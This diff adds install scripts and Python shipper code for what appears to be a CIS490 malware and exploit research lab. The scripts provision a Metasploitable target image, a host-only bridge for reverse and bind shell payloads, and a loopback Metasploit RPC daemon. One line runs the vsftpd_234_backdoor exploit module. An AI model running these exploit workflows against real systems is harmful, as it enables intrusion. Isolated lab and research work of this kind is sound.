+else
+    curl -fL --retry 3 --retry-delay 5 -o "$ARCHIVE.partial" "$IMAGE_URL"
+    mv "$ARCHIVE.partial" "$ARCHIVE"
+fi
+
+log "verifying sha256"
+ACTUAL="$(sha256sum "$ARCHIVE" | awk '{print $1}')"
+if [[ "$ACTUAL" != "$IMAGE_SHA256" ]]; then
+    die "sha256 mismatch: expected $IMAGE_SHA256, got $ACTUAL"
+fi
+log "sha256 ok"
+
+# Extract — handle either zip or 7z, since various mirrors choose one
+# or the other.
+case "$ARCHIVE" in
+    *.zip) ( cd "$WORK_DIR" && unzip -o "$ARCHIVE" ) ;;
+    *.7z|*.7zip) command -v 7z >/dev/null || die "7z not installed"; \
+                 ( cd "$WORK_DIR" && 7z x -y "$ARCHIVE" ) ;;
+    *) die "unsupported archive type: $ARCHIVE" ;;
+esac
+
+VMDK="$(find "$WORK_DIR" -name 'Metasploitable*.vmdk' -print -quit)"
+[[ -n "$VMDK" ]] || die "no Metasploitable*.vmdk in extracted archive"
+
+log "converting $VMDK → qcow2"
+command -v qemu-img >/dev/null || die "qemu-img required (apt install qemu-utils)"
+qemu-img convert -O qcow2 "$VMDK" "$OUT_DIR/metasploitable2.qcow2"
+
+log "done: $OUT_DIR/metasploitable2.qcow2"
+log "Tier-3 ready when msfrpcd is up. See scripts/install-msfrpcd.sh."
--- a/scripts/install-lab-host.sh
+++ b/scripts/install-lab-host.sh
@ -0,0 +1,234 @@
+#!/usr/bin/env bash
+# Install / refresh the CIS490 lab-host role.
+#
+# Idempotent — safe to re-run after `git pull`. Does NOT enroll the
+# host into WireGuard (that's wg-enroll's job, run separately and
+# *first*) and does NOT mint TLS certs (that's wg-pki's job).
+#
+# Steps:
+#   1. Verify prereqs (KVM, zstd, qemu, python3.11+, systemd).
+#   2. Create the cis490 service user + /var/lib/cis490 layout.
+#   3. Sync the repo into /opt/cis490 and build a uv-managed venv.
+#   4. Install systemd units from etc/.
+#   5. Drop /etc/cis490/lab-host.toml (only on first install).
+#
+# Operator finishes by:
+#   - editing /etc/cis490/lab-host.toml (host_id, receiver URL, certs)
+#   - placing leaf certs at /etc/cis490/certs/{lab-host.pem,key,wg-ca.pem}
+#   - `systemctl enable --now cis490-shipper`
+
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
+INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
+DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
+ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
+SERVICE_USER="${SERVICE_USER:-cis490}"
+
+log() { printf '[install-lab-host] %s\n' "$*" >&2; }
+die() { log "FATAL: $*"; exit 1; }
+
+# --- 1. prereqs --------------------------------------------------------
+log "checking prereqs"
+
+if [[ $EUID -ne 0 ]]; then
+    die "must run as root (writes to /opt, /etc, /var/lib, and systemd)"
+fi
+command -v systemctl >/dev/null || die "systemd not found"
+command -v qemu-system-x86_64 >/dev/null || die "qemu-system-x86_64 not on PATH"
+command -v zstd >/dev/null || die "zstd not on PATH (apt install zstd)"
+[[ -e /dev/kvm ]] || die "/dev/kvm missing — KVM not available"
+
+# uv is preferred (lockfile-driven). Fall back to system pip if absent.
+USE_UV=0
+if command -v uv >/dev/null; then USE_UV=1; fi
+
+# --- 2. user + layout --------------------------------------------------
+log "ensuring service user $SERVICE_USER"
+if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
+    useradd --system --no-create-home --shell /usr/sbin/nologin \
+        --home-dir "$INSTALL_ROOT" "$SERVICE_USER"
+fi
+# kvm group lets the service spawn VMs.
+if getent group kvm >/dev/null 2>&1; then
+    usermod -a -G kvm "$SERVICE_USER" || true
+fi
+
+install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
+install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
+    "$DATA_ROOT" "$DATA_ROOT/data" \
+    "$DATA_ROOT/data/episodes" "$DATA_ROOT/data/outbox" \
+    "$DATA_ROOT/data/shipped" "$DATA_ROOT/data/queue" \
+    "$DATA_ROOT/samples" "$DATA_ROOT/samples/store" \
+    "$DATA_ROOT/vm" "$DATA_ROOT/vm/images"
+
+# --- 3. repo + venv ----------------------------------------------------
+log "syncing repo into $INSTALL_ROOT"
+install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
+# We use a clean cp -aT rather than rsync to avoid an extra dep.
+cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
+chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
+
+log "building venv"
+if [[ "$USE_UV" -eq 1 ]]; then
+    sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
+        uv sync --project "$INSTALL_ROOT"
+else
+    sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
+    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
+        --quiet --upgrade pip
+    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
+        --quiet starlette 'uvicorn[standard]' httpx msgpack
+fi
+
+# --- 4. systemd --------------------------------------------------------
+log "installing systemd units"
+install -m 0644 "$REPO_ROOT/etc/cis490-shipper.service" \
+    /etc/systemd/system/cis490-shipper.service
+install -m 0644 "$REPO_ROOT/etc/cis490-orchestrator.service" \
+    /etc/systemd/system/cis490-orchestrator.service
+systemctl daemon-reload
+
+# --- 5. config template (only on first install) -----------------------
+if [[ ! -f "$ETC_ROOT/lab-host.toml" ]]; then
+    log "writing $ETC_ROOT/lab-host.toml (template)"
+    install -m 0640 -o root -g "$SERVICE_USER" \
+        "$REPO_ROOT/etc/lab-host.toml.example" "$ETC_ROOT/lab-host.toml"
+    NEW_INSTALL=1
+else
+    log "$ETC_ROOT/lab-host.toml exists; leaving in place"
+    NEW_INSTALL=0
+fi
+
+# --- 6. orchestrator env file (read by cis490-orchestrator.service) ----
+ENV_FILE="$ETC_ROOT/lab-host.env"
+DEFAULT_HOST_ID="$(hostname -s)"
+if [[ ! -f "$ENV_FILE" ]]; then
+    log "writing $ENV_FILE (host_id defaults to $DEFAULT_HOST_ID — edit if you want something else)"
+    install -m 0640 -o root -g "$SERVICE_USER" /dev/stdin "$ENV_FILE" <<EOF
+# Read by cis490-orchestrator.service. Override per-host as needed.
+FLEET_HOST_ID=$DEFAULT_HOST_ID
+# BRIDGE=br-malware enables source 4 pcap capture AND unlocks the
+# Tier-3 modules whose payloads need callback (reverse/bind shells).
+# install-lab-host.sh provisions the bridge + tap pool below; leave
+# this on unless your lab host can't run NETLINK ops.
+BRIDGE=br-malware
+EOF
+fi
+
+# --- 6b. host-only bridge + per-slot tap pool --------------------------
+# br-malware lets pcap capture the guest traffic and lets bind/reverse
+# shell payloads route between guest and host. We pre-create a small
+# pool of taps so the launchers don't need sudo to attach interfaces;
+# each slot uses cis490tap{SLOT,SLOT+100} (Tier-2 demo + Tier-3
+# target). Idempotent: re-running on an already-set-up host is a
+# no-op.
+if command -v ip >/dev/null && [[ -x "$REPO_ROOT/vm/setup_bridge.sh" ]]; then
+    if "$REPO_ROOT/vm/setup_bridge.sh" >/dev/null 2>&1; then
+        log "bridge br-malware ready"
+        for n in 0 1 2 3 4 5 6 7; do
+            for prefix in cis490tap cis490target; do
+                tap="${prefix}${n}"
+                if ! ip link show "$tap" >/dev/null 2>&1; then
+                    ip tuntap add dev "$tap" mode tap user "$SERVICE_USER" 2>/dev/null || \
+                        ip tuntap add dev "$tap" mode tap 2>/dev/null || true
+                    ip link set "$tap" master br-malware 2>/dev/null || true
+                    ip link set "$tap" up 2>/dev/null || true
+                fi
+            done
+        done
+        log "tap pool: cis490tap0..7 + cis490target0..7 attached to br-malware"
+    else
+        log "WARN: setup_bridge.sh failed; BRIDGE mode will be unavailable"
+        # Comment out BRIDGE in the env file — fleet will still run
+        # Tier-2 + non-callback Tier-3 modules.
+        sed -i 's/^BRIDGE=br-malware/# BRIDGE=br-malware  # auto-disabled: bridge setup failed/' "$ENV_FILE"
+    fi
+fi
+
+# --- 7. mTLS leaf cert (auto-fetch via bootstrap.wg) -------------------
+# Pull our leaf cert from the Pi's bootstrap endpoint if it isn't
+# already on disk. Trust boundary: "reached bootstrap.wg over WG"
+# (iptmonads already filters non-peers from 443). Caddy's TLS cert
+# is verified against the bundled etc/caddy-root.crt — no chicken-
+# and-egg.
+HOST_ID="$(grep -E '^host_id\s*=' "$ETC_ROOT/lab-host.toml" 2>/dev/null \
+    | head -1 | sed -E 's/^host_id\s*=\s*"([^"]+)".*/\1/')"
+if [[ -z "$HOST_ID" || "$HOST_ID" == "REPLACE_ME" ]]; then
+    log "skipping cert auto-fetch: host_id not set in $ETC_ROOT/lab-host.toml"
+elif [[ ! -f "$ETC_ROOT/certs/lab-host.pem" ]]; then
+    log "fetching leaf cert from https://bootstrap.wg/v1/cert/$HOST_ID"
+    install -d -m 0755 -o root -g "$SERVICE_USER" "$ETC_ROOT/certs"
+    TAR="/tmp/cis490-bootstrap-$$.tar"
+    if curl -fsS --cacert "$REPO_ROOT/etc/caddy-root.crt" \
+            --connect-timeout 10 --max-time 60 \
+            "https://bootstrap.wg/v1/cert/$HOST_ID" -o "$TAR"; then
+        tar -C "$ETC_ROOT/certs" -xf "$TAR"
+        mv "$ETC_ROOT/certs/ca.crt"          "$ETC_ROOT/certs/wg-ca.pem"
+        mv "$ETC_ROOT/certs/$HOST_ID.pem"    "$ETC_ROOT/certs/lab-host.pem"
+        mv "$ETC_ROOT/certs/$HOST_ID.key"    "$ETC_ROOT/certs/lab-host.key"
+        chown root:"$SERVICE_USER" "$ETC_ROOT/certs/"*.pem \
+            "$ETC_ROOT/certs/lab-host.key"
+        chmod 0644 "$ETC_ROOT/certs/"*.pem
+        chmod 0640 "$ETC_ROOT/certs/lab-host.key"
+        rm -f "$TAR"
+        log "leaf cert installed for host_id=$HOST_ID"
+    else
+        rm -f "$TAR"
+        log "WARN: bootstrap.wg fetch failed — make sure /etc/hosts maps it"
+        log "      to 10.100.0.1 and that wg0 is up. cert delivery skipped."
+    fi
+else
+    log "$ETC_ROOT/certs/lab-host.pem present; skipping auto-fetch"
+fi
+
+# --- 8. baseline VM image + cidata (best-effort) -----------------------
+ALPINE_IMG="$DATA_ROOT/vm/images/alpine-baseline.qcow2"
+CIDATA_ISO="$DATA_ROOT/vm/images/cidata.iso"
+if [[ ! -f "$ALPINE_IMG" ]]; then
+    if "$REPO_ROOT/scripts/fetch-alpine-baseline.sh" "$ALPINE_IMG"; then
+        log "fetched Alpine baseline -> $ALPINE_IMG"
+    else
+        log "WARN: Alpine baseline fetch failed; drop a qcow2 at $ALPINE_IMG manually"
+    fi
+fi
+if [[ -f "$ALPINE_IMG" && ! -f "$CIDATA_ISO" ]]; then
+    log "building cidata.iso (in-guest agent embedded)"
+    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/python" \
+        "$INSTALL_ROOT/tools/build_cidata.py" "$CIDATA_ISO" || \
+        log "WARN: cidata build failed; run tools/build_cidata.py manually"
+fi
+# Symlink the canonical paths the launchers look at, when missing.
+ln -sf "$ALPINE_IMG" "$INSTALL_ROOT/vm/images/alpine-baseline.qcow2" 2>/dev/null || true
+ln -sf "$CIDATA_ISO" "$INSTALL_ROOT/vm/images/cidata.iso" 2>/dev/null || true
+
+if [[ "$NEW_INSTALL" == "1" ]]; then
+    log ""
+    log "================================================================="
+    log "  FIRST-INSTALL NEXT STEPS                                        "
+    log "================================================================="
+    log "  1. Edit $ETC_ROOT/lab-host.toml — set host_id and receiver URL."
+    log ""
+    log "  2. (On the Pi.) Mint + ship a leaf cert for this host:"
+    log "       sudo wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip>"
+    log ""
+    log "  3. Run the diagnostic — every red row prints the exact fix:"
+    log "       $INSTALL_ROOT/.venv/bin/python \\"
+    log "           $INSTALL_ROOT/tools/cis490_doctor.py --role lab-host"
+    log ""
+    log "  4. Smoke-test the pipe (returns ok=true on success):"
+    log "       sudo -u $SERVICE_USER $INSTALL_ROOT/.venv/bin/python -m shipper \\"
+    log "            --config $ETC_ROOT/lab-host.toml --ping"
+    log ""
+    log "  5. Turn on the services — episodes start flowing immediately:"
+    log "       sudo systemctl enable --now cis490-shipper cis490-orchestrator"
+    log "================================================================="
+fi
+
+log "lab-host install complete."
+log ""
+log "Cloning this repo and running the launchers manually is NOT enough."
+log "The lab-host role's data flow lives in the systemd services this"
+log "script just installed. If $INSTALL_ROOT/index.jsonl on the Pi stays"
+log "empty after step 5, run:"
+log "   $INSTALL_ROOT/.venv/bin/python $INSTALL_ROOT/tools/cis490_doctor.py"
--- a/scripts/install-msfrpcd.sh
+++ b/scripts/install-msfrpcd.sh
@ -0,0 +1,124 @@
+#!/usr/bin/env bash
+# Install + configure ``msfrpcd`` for the Tier-3 exploit driver.
+#
+# Idempotent: re-running on a host that already has msfrpcd refreshes
+# the systemd unit and credentials but doesn't reinstall the framework.
+#
+# Steps:
+#   1. Install metasploit-framework via the host package manager (or
+#      report the right one-liner for that distro). Big download —
+#      ~1 GiB and several minutes.
+#   2. Generate a strong password and store at /etc/cis490/msfrpc.env
+#      (mode 0640, owner root:cis490).
+#   3. Drop /etc/systemd/system/cis490-msfrpcd.service that runs
+#      msfrpcd bound to 127.0.0.1:55553 with the generated password.
+#   4. Enable + start.
+#
+# After this runs, ``MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env;
+# echo $MSFRPC_PASSWORD)`` makes tools/run_tier3_demo.py work zero-touch.
+
+set -euo pipefail
+
+ETC_ROOT="/etc/cis490"
+ENV_FILE="$ETC_ROOT/msfrpc.env"
+UNIT="/etc/systemd/system/cis490-msfrpcd.service"
+PORT="${MSFRPC_PORT:-55553}"
+USER_NAME="${MSFRPC_USER:-msf}"
+
+log() { printf '[install-msfrpcd] %s\n' "$*" >&2; }
+die() { log "FATAL: $*"; exit 1; }
+
+[[ $EUID -eq 0 ]] || die "must run as root"
+command -v systemctl >/dev/null || die "systemd not found"
+
+# --- 1. install metasploit-framework -----------------------------------
+if ! command -v msfrpcd >/dev/null; then
+    log "msfrpcd not found; installing metasploit-framework"
+    if command -v apt-get >/dev/null; then
+        # The Debian/Ubuntu metasploit-framework package isn't in
+        # the default repos for most distros. Use Rapid7's official
+        # nightly installer when available.
+        if [[ ! -x /opt/metasploit-framework/bin/msfrpcd ]]; then
+            log "fetching Rapid7 nightly installer"
+            curl -fsSL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
+                -o /tmp/msfinstall.sh || true
+            log "automated install not available — install manually:"
+            log "  https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html"
+            die "rerun once msfrpcd is on PATH"
+        fi
+        # Symlink the wrapper so ``msfrpcd`` is on PATH.
+        ln -sf /opt/metasploit-framework/bin/msfrpcd /usr/local/bin/msfrpcd
+    elif command -v pacman >/dev/null; then
+        log "pacman -S metasploit"
+        pacman -Sy --noconfirm metasploit
+    elif command -v dnf >/dev/null; then
+        die "Fedora/RHEL: install metasploit-framework manually, then re-run"
+    else
+        die "unknown package manager — install metasploit-framework manually"
+    fi
+fi
+
+command -v msfrpcd >/dev/null || die "msfrpcd still missing after install attempt"
+
+# --- 2. generate password ----------------------------------------------
+install -d -m 0755 -o root -g root "$ETC_ROOT"
+if ! id -u cis490 >/dev/null 2>&1; then
+    useradd --system --no-create-home --shell /usr/sbin/nologin cis490
+fi
+if [[ ! -f "$ENV_FILE" ]]; then
+    log "generating msfrpc password"
+    PW="$(openssl rand -base64 24 | tr -d '/+=' | head -c 32)"
+    install -m 0640 -o root -g cis490 /dev/stdin "$ENV_FILE" <<EOF
+# Auto-generated by install-msfrpcd.sh — do not edit.
+MSFRPC_HOST=127.0.0.1
+MSFRPC_PORT=$PORT
+MSFRPC_USER=$USER_NAME
+MSFRPC_PASSWORD=$PW
+EOF
+else
+    log "$ENV_FILE exists; preserving existing password"
+fi
+
+# --- 3. systemd unit ----------------------------------------------------
+log "installing systemd unit"
+cat > "$UNIT" <<EOF
+[Unit]
+Description=CIS490 — Metasploit RPC daemon (loopback only)
+Documentation=https://maxgit.wg/spectral/CIS490
+After=network-online.target
+Wants=network-online.target
+
+[Service]
+Type=simple
+EnvironmentFile=$ENV_FILE
+# msfrpcd flags:
+#   -P <pw>   password
+#   -U <user> username
+#   -a <ip>   bind address (loopback only — Tier-3 driver runs locally)
+#   -p <port> port
+#   -f        foreground (no daemonization, so systemd manages PID)
+ExecStart=/usr/bin/env msfrpcd -P \${MSFRPC_PASSWORD} -U \${MSFRPC_USER} -a 127.0.0.1 -p \${MSFRPC_PORT} -f
+Restart=on-failure
+RestartSec=5
+NoNewPrivileges=true
+PrivateTmp=true
+ProtectSystem=full
+ProtectHome=true
+
+[Install]
+WantedBy=multi-user.target
+EOF
+
+systemctl daemon-reload
+systemctl enable --now cis490-msfrpcd
+
+# --- 4. final smoke -----------------------------------------------------
+sleep 2
+if ! ss -ltn 2>/dev/null | grep -q ":$PORT"; then
+    log "WARN: nothing listening on 127.0.0.1:$PORT yet — check"
+    log "       journalctl -u cis490-msfrpcd"
+fi
+
+log "done. To run a Tier-3 episode:"
+log "  set -a; . $ENV_FILE; set +a"
+log "  python tools/run_tier3_demo.py --module vsftpd_234_backdoor"
--- a/scripts/install-receiver.sh
+++ b/scripts/install-receiver.sh
@ -0,0 +1,112 @@
+#!/usr/bin/env bash
+# Install / refresh the CIS490 receiver role on the central WG node
+# (the Pi5 in our setup). Idempotent — safe to re-run.
+#
+# Steps:
+#   1. Verify prereqs (python3.11+, systemd).
+#   2. Create the cis490 service user + /var/lib/cis490 layout.
+#   3. Sync the repo into /opt/cis490 and build a venv.
+#   4. Install cis490-receiver.service.
+#   5. Drop /etc/cis490/receiver.toml on first install.
+#
+# This script does NOT:
+#   - configure Caddy. Add a `collector.wg` block to your spectral/caddy
+#     config to terminate TLS and reverse-proxy to 127.0.0.1:8443.
+#   - issue server / client certs. wg-pki owns CA + leaf issuance.
+#   - open firewall ports. iptmonads owns the WG-side ruleset.
+
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
+INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
+DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
+ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
+SERVICE_USER="${SERVICE_USER:-cis490}"
+
+log() { printf '[install-receiver] %s\n' "$*" >&2; }
+die() { log "FATAL: $*"; exit 1; }
+
+# --- 1. prereqs --------------------------------------------------------
+log "checking prereqs"
+if [[ $EUID -ne 0 ]]; then
+    die "must run as root"
+fi
+command -v systemctl >/dev/null || die "systemd not found"
+command -v python3 >/dev/null || die "python3 not on PATH"
+
+PY_VER="$(python3 -c 'import sys; print(f"{sys.version_info.major}.{sys.version_info.minor}")')"
+if ! python3 -c 'import sys; sys.exit(0 if sys.version_info >= (3,11) else 1)'; then
+    die "python >=3.11 required, found $PY_VER"
+fi
+
+USE_UV=0
+if command -v uv >/dev/null; then USE_UV=1; fi
+
+# --- 2. user + layout --------------------------------------------------
+log "ensuring service user $SERVICE_USER"
+if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
+    useradd --system --no-create-home --shell /usr/sbin/nologin \
+        --home-dir "$INSTALL_ROOT" "$SERVICE_USER"
+fi
+
+install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
+install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
+    "$DATA_ROOT" "$DATA_ROOT/episodes" "$DATA_ROOT/incoming"
+install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0750 "$DATA_ROOT"
+# Pre-create the index file so the first PUT doesn't race on creation.
+sudo -u "$SERVICE_USER" -- touch "$DATA_ROOT/index.jsonl"
+
+# --- 3. repo + venv ----------------------------------------------------
+log "syncing repo into $INSTALL_ROOT"
+install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
+cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
+chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
+
+log "building venv"
+if [[ "$USE_UV" -eq 1 ]]; then
+    sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
+        uv sync --project "$INSTALL_ROOT"
+else
+    sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
+    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
+        --quiet --upgrade pip
+    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
+        --quiet starlette 'uvicorn[standard]'
+fi
+
+# --- 4. systemd --------------------------------------------------------
+log "installing systemd units (receiver + bootstrap)"
+install -m 0644 "$REPO_ROOT/etc/cis490-receiver.service" \
+    /etc/systemd/system/cis490-receiver.service
+install -m 0644 "$REPO_ROOT/etc/cis490-bootstrap.service" \
+    /etc/systemd/system/cis490-bootstrap.service
+systemctl daemon-reload
+
+# --- 5. config template (only on first install) -----------------------
+if [[ ! -f "$ETC_ROOT/receiver.toml" ]]; then
+    log "writing $ETC_ROOT/receiver.toml (template)"
+    install -m 0640 -o root -g "$SERVICE_USER" \
+        "$REPO_ROOT/etc/receiver.toml.example" "$ETC_ROOT/receiver.toml"
+    log ""
+    log "FIRST-INSTALL NEXT STEPS:"
+    log "  1. Verify $ETC_ROOT/receiver.toml paths."
+    log "  2. Add a collector.wg block to your spectral/caddy config."
+    log "     Example:"
+    log "       collector.wg {"
+    log "           tls internal"
+    log "           reverse_proxy 127.0.0.1:8443"
+    log "       }"
+    log "     (mTLS to clients is enforced by the wg-pki CA bundle on"
+    log "      the receiver side once leaf certs are issued.)"
+    log "  3. Open the WG-side port via iptmonads."
+    log "  4. systemctl enable --now cis490-receiver cis490-bootstrap"
+    log "  5. From a lab host: cis490-shipper --ping"
+    log ""
+    log "Bootstrap endpoint (cis490-bootstrap on :8446 + Caddy bootstrap.wg)"
+    log "lets enrolled lab hosts auto-fetch their leaf certs. Without it,"
+    log "operators have to hand-carry tarballs via deploy-cis490-cert.sh."
+else
+    log "$ETC_ROOT/receiver.toml exists; leaving in place"
+fi
+
+log "receiver install complete."
--- a/scripts/issue-cis490-client-cert-wrapper.sh
+++ b/scripts/issue-cis490-client-cert-wrapper.sh
@ -0,0 +1,50 @@
+#!/usr/bin/env bash
+# Wrapper that re-points the wg-pki issuer script's relative-path
+# assumption (PWD-derived publish dir, $REPO_ROOT/issued/) to the
+# absolute /var/lib/wg-pki/issued/ that the bootstrap service uses.
+#
+# wg-pki ships the actual issuer at
+# /home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh, which
+# computes paths relative to its own location. This wrapper sets
+# WG_PKI_STATE so the CA key is found in /var/lib/wg-pki, and forces
+# --out-dir to a path under /var/lib so cis490-bootstrap (with
+# ProtectHome=tmpfs) can write the resulting tarballs.
+
+set -euo pipefail
+
+# Resolve issuer path: prefer the install-time copy at /opt/wg-pki/,
+# fall back to whatever wg-pki clone the operator has under /home.
+ISSUER="${WG_PKI_ISSUER:-}"
+if [[ -z "$ISSUER" ]]; then
+    for cand in \
+        /opt/wg-pki/scripts/issue-cis490-client-cert.sh \
+        /home/max/wg-pki/scripts/issue-cis490-client-cert.sh \
+        /home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh; do
+        if [[ -x "$cand" ]]; then ISSUER="$cand"; break; fi
+    done
+fi
+if [[ -z "$ISSUER" || ! -x "$ISSUER" ]]; then
+    echo "wrapper: no issue-cis490-client-cert.sh found; tried /opt/wg-pki, /home/max/wg-pki, /home/max/.env/wg-pki" >&2
+    exit 2
+fi
+OUT_ROOT="/var/lib/wg-pki/issued"
+
+if [[ $# -lt 1 ]]; then
+    echo "usage: $0 <host_id> [--out-dir DIR] [--days N]" >&2
+    exit 2
+fi
+
+HOST_ID="$1"; shift
+
+# Pull off any --out-dir already passed; we override.
+EXTRA=()
+while [[ $# -gt 0 ]]; do
+    case "$1" in
+        --out-dir) shift 2 ;;          # drop, we set it ourselves
+        *) EXTRA+=("$1"); shift ;;
+    esac
+done
+
+mkdir -p "$OUT_ROOT/$HOST_ID"
+exec env WG_PKI_STATE=/var/lib/wg-pki \
+    "$ISSUER" "$HOST_ID" --out-dir "$OUT_ROOT/$HOST_ID" "${EXTRA[@]}"
--- a/shipper/init.py
+++ b/shipper/init.py
--- a/shipper/main.py
+++ b/shipper/main.py
@ -0,0 +1,106 @@
+"""``cis490-shipper`` CLI entrypoint.
+
+Modes:
+
+  --ping       hit /v1/ping; exit 0 if 200/ok, non-zero otherwise.
+               No tarball flow; index.jsonl on the receiver is untouched.
+  --once       one scan pass over data/episodes/, ship anything done, exit.
+  (default)    long-running daemon; rescans every scan_interval_s.
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import logging
+import signal
+import sys
+from pathlib import Path
+
+from .config import ShipperConfig
+from .queue import ShipperQueue
+from .transport import ShipperTransport
+
+
+def _setup_logging(level: str) -> None:
+    logging.basicConfig(
+        level=getattr(logging, level.upper(), logging.INFO),
+        format="%(asctime)s %(levelname)s %(name)s %(message)s",
+    )
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser(prog="cis490-shipper")
+    parser.add_argument(
+        "--config",
+        default="/etc/cis490/lab-host.toml",
+        help="Path to lab-host config (TOML)",
+    )
+    parser.add_argument(
+        "--ping",
+        action="store_true",
+        help="Hit /v1/ping on the receiver and exit",
+    )
+    parser.add_argument(
+        "--once",
+        action="store_true",
+        help="One scan pass, then exit (default is long-running daemon)",
+    )
+    parser.add_argument("--log-level", default="INFO")
+    args = parser.parse_args(argv)
+
+    _setup_logging(args.log_level)
+    log = logging.getLogger("cis490.shipper")
+
+    try:
+        cfg = ShipperConfig.load(args.config)
+    except (FileNotFoundError, ValueError) as e:
+        log.error("config error: %s", e)
+        return 2
+
+    transport = ShipperTransport(cfg)
+
+    if args.ping:
+        result = transport.ping()
+        # Print structured one-liner for CI / test pipelines.
+        print(json.dumps({
+            "ok": result.ok,
+            "status_code": result.status_code,
+            "host_id": cfg.host_id,
+            "receiver": cfg.receiver.url,
+            "body": result.body,
+            "error": result.error,
+        }))
+        return 0 if result.ok else 1
+
+    queue = ShipperQueue(cfg, transport)
+    if args.once:
+        result = queue.run_once()
+        log.info(
+            "scan complete: scanned=%d shipped=%d transient=%d conflicts=%d fatal=%d",
+            result.scanned, result.shipped, result.transient_failures,
+            result.conflicts, result.fatal,
+        )
+        # Exit code reflects fatal-only; transient failures aren't an error
+        # because the next pass / pod restart will retry.
+        return 1 if result.fatal else 0
+
+    # Daemon mode
+    stopping = False
+    def _stop(signum, frame):  # noqa: ARG001
+        nonlocal stopping
+        log.info("received signal %s; finishing pass and exiting", signum)
+        stopping = True
+    signal.signal(signal.SIGTERM, _stop)
+    signal.signal(signal.SIGINT, _stop)
+
+    log.info(
+        "shipper starting: host_id=%s data_root=%s receiver=%s",
+        cfg.host_id, cfg.data_root, cfg.receiver.url,
+    )
+    queue.run_forever(stop_check=lambda: stopping)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/shipper/config.py
+++ b/shipper/config.py
@ -0,0 +1,91 @@
+"""Lab-host shipper config — loaded from /etc/cis490/lab-host.toml."""
+
+from __future__ import annotations
+
+import tomllib
+from dataclasses import dataclass, field
+from pathlib import Path
+
+
+@dataclass(frozen=True)
+class ReceiverEndpoint:
+    url: str                       # e.g. "https://collector.wg"
+    ca_bundle: Path | None = None
+    client_cert: Path | None = None
+    client_key: Path | None = None
+    bearer_token: str | None = None
+    verify_tls: bool = True
+
+
+@dataclass(frozen=True)
+class ShipperConfig:
+    host_id: str
+    data_root: Path                # Lab-host data root; episodes/, outbox/, shipped/ live here.
+    receiver: ReceiverEndpoint
+    # Daemon mode: how often to scan for new done.marker files.
+    scan_interval_s: float = 5.0
+    # PUT timeout per episode. Tarballs are bounded by max_episode_bytes;
+    # at WG speeds this is well under 60s for a typical episode.
+    request_timeout_s: float = 60.0
+    # Backoff schedule on transient (5xx / network) failures, in seconds,
+    # capped at the last entry. The shipper's scan loop will pick the
+    # episode up again on the next pass regardless.
+    backoff_seconds: tuple[float, ...] = (1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 60.0, 120.0, 300.0)
+    # Local retention before pruning data/shipped/.
+    keep_local_for_days: int = 7
+
+    @property
+    def episodes_dir(self) -> Path:
+        return self.data_root / "episodes"
+
+    @property
+    def outbox_dir(self) -> Path:
+        return self.data_root / "outbox"
+
+    @property
+    def shipped_dir(self) -> Path:
+        return self.data_root / "shipped"
+
+    @classmethod
+    def load(cls, path: str | Path) -> "ShipperConfig":
+        with open(path, "rb") as f:
+            data = tomllib.load(f)
+
+        host_id = data.get("host_id")
+        if not isinstance(host_id, str) or not host_id:
+            raise ValueError("lab-host config: host_id (string) required at top level")
+
+        paths = data.get("paths", {})
+        data_root = Path(paths.get("data_root", "/var/lib/cis490/data")).resolve()
+
+        rcv = data.get("receiver", {})
+        url = rcv.get("url")
+        if not isinstance(url, str) or not url:
+            raise ValueError("lab-host config: receiver.url required")
+
+        receiver = ReceiverEndpoint(
+            url=url.rstrip("/"),
+            ca_bundle=_optional_path(rcv.get("ca_bundle")),
+            client_cert=_optional_path(rcv.get("client_cert")),
+            client_key=_optional_path(rcv.get("client_key")),
+            bearer_token=rcv.get("bearer_token"),
+            verify_tls=bool(rcv.get("verify_tls", True)),
+        )
+
+        retention = data.get("retention", {})
+        return cls(
+            host_id=host_id,
+            data_root=data_root,
